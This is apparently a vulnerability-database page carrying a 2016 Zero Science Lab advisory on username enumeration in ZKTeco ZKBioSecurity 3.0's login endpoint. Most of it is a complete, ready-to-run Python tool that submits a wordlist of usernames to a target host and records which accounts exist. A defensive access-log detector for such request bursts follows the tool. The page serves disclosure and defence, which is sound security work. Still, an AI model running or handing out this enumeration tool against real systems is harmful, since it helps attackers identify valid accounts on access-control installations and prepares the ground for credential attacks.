ZKTeco ZKBioSecurity 3.0 User Enumeration Weakness

Published: 31 Aug 2016 00:00:00
Reported by: Gjoko Krstic
Type: zeroscience
Source: www.zeroscience.mk

ZKBioSecurity3.0 'authLoginAction!login.do' script enumerates valid usernames, exposing sensitive informatio

Related

Reporter | Title | Published
ATTACKERKB | CVE-2016-20030 | 15 Mar 2026 13:35
CNNVD | ZKTeco ZKBioSecurity security vulnerability | 16 Mar 2026 00:00
CVE | CVE-2016-20030 | 15 Mar 2026 13:35
Cvelist | CVE-2016-20030 ZKTeco ZKBioSecurity 3.0 User Enumeration via authLoginAction | 15 Mar 2026 13:35
EUVD | EUVD-2016-10815 | 16 Mar 2026 15:30
NVD | CVE-2016-20030 | 16 Mar 2026 14:17
OpenVAS | ZKTeco ZKBioSecurity Multiple Vulnerabilities (Jul 2016) | 6 Oct 2016 00:00
Positive Technologies | PT-2026-25728 | 15 Mar 2026 00:00
Vulnrichment | CVE-2016-20030 ZKTeco ZKBioSecurity 3.0 User Enumeration via authLoginAction | 15 Mar 2026 13:35

#!/usr/bin/env python
#
#
# ZKTeco ZKBioSecurity 3.0 User Enumeration Weakness
#
#
# Vendor: ZKTeco Inc. | Xiamen ZKTeco Biometric Identification Technology Co.,ltd
# Product web page: http://www.zkteco.com
# Affected version: 3.0.1.0_R_230
#                   Platform: 3.0.1.0_R_230
#                   Personnel: 1.0.1.0_R_1916
#                   Access: 6.0.1.0_R_1757
#                   Elevator: 2.0.1.0_R_777
#                   Visitor: 2.0.1.0_R_877
#                   Video: 2.0.1.0_R_489
#                   Adms: 1.0.1.0_R_197
#
# Summary: ZKBioSecurity3.0 is the ultimate "All in One" web based security
# platform developed by ZKTeco. It contains four integrated modules: access
# control, video linkage, elevator control and visitor management. With an
# optimized system architecture designed for high level biometric identification
# and a modern-user friendly UI, ZKBioSecurity 3.0 provides the most advanced
# solution for a whole new user experience.
#
# Desc: The weakness is caused due to the 'authLoginAction!login.do' script
# enumerating the list of valid usernames when some characters are provided
# via the 'username' parameter.
#
# Tested on: Microsoft Windows 7 Ultimate SP1 (EN)
#            Microsoft Windows 7 Professional SP1 (EN)
#            Apache-Coyote/1.1
#            Apache Tomcat/7.0.56
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
#                             @zeroscience
#
#
# Advisory ID: ZSL-2016-5366
# Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5366.php
#
#
# 18.07.2016
#
#

# Python 2 script (print statements, urllib2, cookielib).
import cookielib
import argparse
import urllib2
import urllib
import json
import sys

from colorama import Fore, Back, Style, init

init()

print '\n-----------------------------------------------'
print 'User Enumeration Tool v0.2 for ZKBioSecurity'
print 'Copyleft (c) 2016, Zero Science Lab'
print 'by lqwrm'
print '-----------------------------------------------\n'
parser = argparse.ArgumentParser()
parser.add_argument('-t', help='target IP or hostname', action='store', dest='target')
parser.add_argument('-f', help='username wordlist', action='store', dest='file')

args = parser.parse_args()
# Both -t and -f are required (script name plus four arguments).
if len(sys.argv) != 5:
	parser.print_help()
	sys.exit()

host = args.target
fn = args.file

try:
	users = open(args.file, 'r')
except IOError:
	print '[!] Error opening \'' +fn+ '\' file.'
	sys.exit()
lines = users.read().splitlines()
# Count the lines already read instead of opening the file a second time.
print '[*] Loaded %d usernames for testing.\n' % len(lines)
users.close()
cj = cookielib.CookieJar()
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
results = open('validusers.txt', 'w')
for line in lines:
	# The password value is irrelevant: only the server's message is inspected.
	chk_usr = urllib.urlencode({'username'   : line,
								'password'   : 'noneed',
								'loginType'  : 'NORMAL',
								'un'         : '1470746177485_7049',
								'systemCode' : 'visLogin.jsp'
								})
	try:
		xhr = json.load(opener.open('http://'+host+'/authLoginAction!login.do', chk_usr))
	except Exception:
		print '[!] Error connecting to http://'+host
		sys.exit()
	print '[+] Testing username: ' +Fore.GREEN+line+Fore.RESET
	# Take the first value of the JSON reply; stays None if the reply is empty.
	fnrand = None
	for key, value in xhr.iteritems():
		fnrand = value
		break
	# The weakness: this message is what the script treats as the reply for a
	# registered username, so the login response itself discloses validity.
	if fnrand == 'Username or password is error.':
		print '[!] Found ' +Style.BRIGHT+Fore.RED+line+Fore.RESET+Style.RESET_ALL+ ' as valid registered user.'
		results.write('%s\n' % line)
results.close()
print '\n[*] Enumeration completed!'
print '[*] Valid usernames successfully written to \'validusers.txt\' file.'
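
A defender-side check for the request pattern the script above produces, added here as an example and not part of the original advisory: the tested usernames travel in the POST body and never reach the access log, so the usable signal is a burst of POSTs to `/authLoginAction!login.do` from one client. It assumes a Tomcat access log in the "common" pattern; the threshold, the window and the sample lines are constructed for illustration.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

LOGIN_PATH = "/authLoginAction!login.do"  # endpoint named in the advisory

# Assumed log layout: Tomcat AccessLogValve "common" pattern.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" \d{3} \S+$'
)

def find_enumeration(lines, threshold=5, window=timedelta(seconds=60)):
    """Map client IP -> peak number of login POSTs seen inside one sliding
    window, for clients that reached `threshold` (illustrative default)."""
    recent = defaultdict(deque)  # per-client timestamps still inside the window
    peaks = {}
    for line in lines:
        m = LINE_RE.match(line.strip())
        if not m or m["method"] != "POST":
            continue  # unparsable line, or not a login submission
        # Drop query string and ;jsessionid path parameter before comparing.
        if m["path"].split("?", 1)[0].split(";", 1)[0] != LOGIN_PATH:
            continue
        ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
        seen = recent[m["ip"]]
        seen.append(ts)
        while ts - seen[0] > window:
            seen.popleft()
        if len(seen) >= threshold:
            peaks[m["ip"]] = max(peaks.get(m["ip"], 0), len(seen))
    return peaks

# Constructed sample input (documentation address ranges), not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [18/Jul/2016:10:00:%02d +0200] '
    '"POST /authLoginAction!login.do HTTP/1.1" 200 61' % s
    for s in range(6)
] + [
    '198.51.100.7 - - [18/Jul/2016:10:00:03 +0200] "POST /authLoginAction!login.do HTTP/1.1" 200 61',
    '198.51.100.7 - - [18/Jul/2016:10:05:40 +0200] "POST /authLoginAction!login.do;jsessionid=X HTTP/1.1" 200 61',
    '198.51.100.7 - - [18/Jul/2016:10:05:41 +0200] "GET /visLogin.jsp HTTP/1.1" 200 5120',
    'truncated entry',
]

if __name__ == "__main__":
    for ip, peak in find_enumeration(SAMPLE_LOG).items():
        print("possible username enumeration from %s: %d login POSTs in 60 s" % (ip, peak))
```

The per-client queues assume each client's entries appear in time order, which holds for a single access log file read top to bottom.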

Vulners AI Score: 5.8 (Medium risk)
CVSS 4: 9.3
CVSS 3.1: 9.8
EPSS: 0.00563